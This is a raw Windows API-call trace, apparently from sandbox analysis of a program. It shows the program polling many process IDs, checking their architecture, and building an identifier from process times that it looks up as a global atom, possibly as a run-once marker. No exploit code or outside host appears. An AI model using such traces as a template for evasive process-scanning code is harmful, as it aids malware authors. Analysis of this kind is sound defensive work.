	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.234] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.234] CloseHandle (hObject=0x20c) returned 1
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.234] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.235] CloseHandle (hObject=0x20c) returned 1
	[0089.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.235] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.235] CloseHandle (hObject=0x20c) returned 1
	[0089.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.235] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.235] CloseHandle (hObject=0x20c) returned 1
	[0089.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.235] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.235] CloseHandle (hObject=0x20c) returned 1
	[0089.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.235] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.235] CloseHandle (hObject=0x20c) returned 1
	[0089.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.235] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.236] CloseHandle (hObject=0x20c) returned 1
	[0089.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.236] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.236] CloseHandle (hObject=0x20c) returned 1
	[0089.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.236] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.236] CloseHandle (hObject=0x20c) returned 1
	[0089.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.236] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.236] CloseHandle (hObject=0x20c) returned 1
	[0089.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.236] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.236] CloseHandle (hObject=0x20c) returned 1
	[0089.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.237] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.237] CloseHandle (hObject=0x20c) returned 1
	[0089.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.237] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.237] CloseHandle (hObject=0x20c) returned 1
	[0089.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.237] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.237] CloseHandle (hObject=0x20c) returned 1
	[0089.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.237] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.237] CloseHandle (hObject=0x20c) returned 1
	[0089.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.237] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.237] CloseHandle (hObject=0x20c) returned 1
	[0089.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.237] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.238] CloseHandle (hObject=0x20c) returned 1
	[0089.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.238] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.238] CloseHandle (hObject=0x20c) returned 1
	[0089.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.238] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.238] CloseHandle (hObject=0x20c) returned 1
	[0089.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.238] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.238] CloseHandle (hObject=0x20c) returned 1
	[0089.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.238] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.238] CloseHandle (hObject=0x20c) returned 1
	[0089.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.238] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.238] CloseHandle (hObject=0x20c) returned 1
	[0089.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.239] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.239] CloseHandle (hObject=0x20c) returned 1
	[0089.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.239] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.239] CloseHandle (hObject=0x20c) returned 1
	[0089.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.239] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.239] CloseHandle (hObject=0x20c) returned 1
	[0089.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.239] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.239] CloseHandle (hObject=0x20c) returned 1
	[0089.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.239] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.239] CloseHandle (hObject=0x20c) returned 1
	[0089.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.239] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.239] CloseHandle (hObject=0x20c) returned 1
	[0089.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.240] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.240] CloseHandle (hObject=0x20c) returned 1
	[0089.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.240] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.240] CloseHandle (hObject=0x20c) returned 1
	[0089.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.240] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.240] CloseHandle (hObject=0x20c) returned 1
	[0089.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.240] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.241] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.241] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.241] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.241] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.241] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.241] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.241] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.241] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.241] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.242] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.242] CloseHandle (hObject=0x20c) returned 1
	[0089.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.242] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.242] CloseHandle (hObject=0x20c) returned 1
	[0089.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.314] CloseHandle (hObject=0x20c) returned 1
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.315] CloseHandle (hObject=0x20c) returned 1
	[0089.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.315] CloseHandle (hObject=0x20c) returned 1
	[0089.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.315] CloseHandle (hObject=0x20c) returned 1
	[0089.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.315] CloseHandle (hObject=0x20c) returned 1
	[0089.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.315] CloseHandle (hObject=0x20c) returned 1
	[0089.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.316] CloseHandle (hObject=0x20c) returned 1
	[0089.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.316] CloseHandle (hObject=0x20c) returned 1
	[0089.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.316] CloseHandle (hObject=0x20c) returned 1
	[0089.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.316] CloseHandle (hObject=0x20c) returned 1
	[0089.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.317] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.317] CloseHandle (hObject=0x20c) returned 1
	[0089.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.317] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.317] CloseHandle (hObject=0x20c) returned 1
	[0089.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.317] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.317] CloseHandle (hObject=0x20c) returned 1
	[0089.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.317] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.317] CloseHandle (hObject=0x20c) returned 1
	[0089.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.317] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.317] CloseHandle (hObject=0x20c) returned 1
	[0089.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.317] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.317] CloseHandle (hObject=0x20c) returned 1
	[0089.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.318] CloseHandle (hObject=0x20c) returned 1
	[0089.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.318] CloseHandle (hObject=0x20c) returned 1
	[0089.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.318] CloseHandle (hObject=0x20c) returned 1
	[0089.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.318] CloseHandle (hObject=0x20c) returned 1
	[0089.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.318] CloseHandle (hObject=0x20c) returned 1
	[0089.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.319] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.319] CloseHandle (hObject=0x20c) returned 1
	[0089.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.319] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.319] CloseHandle (hObject=0x20c) returned 1
	[0089.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.319] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.319] CloseHandle (hObject=0x20c) returned 1
	[0089.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.319] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.319] CloseHandle (hObject=0x20c) returned 1
	[0089.319] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.319] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.319] CloseHandle (hObject=0x20c) returned 1
	[0089.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.320] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.320] CloseHandle (hObject=0x20c) returned 1
	[0089.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.320] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.320] CloseHandle (hObject=0x20c) returned 1
	[0089.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.320] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.320] CloseHandle (hObject=0x20c) returned 1
	[0089.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.320] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.320] CloseHandle (hObject=0x20c) returned 1
	[0089.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.320] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.320] CloseHandle (hObject=0x20c) returned 1
	[0089.320] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.321] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.321] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.321] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.321] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.321] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.322] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.322] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.322] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.322] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.322] CloseHandle (hObject=0x20c) returned 1
	[0089.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.322] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.322] CloseHandle (hObject=0x20c) returned 1
	[0089.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.389] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.389] CloseHandle (hObject=0x20c) returned 1
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.389] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.389] CloseHandle (hObject=0x20c) returned 1
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.389] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.389] CloseHandle (hObject=0x20c) returned 1
	[0089.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.390] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.390] CloseHandle (hObject=0x20c) returned 1
	[0089.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.390] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.390] CloseHandle (hObject=0x20c) returned 1
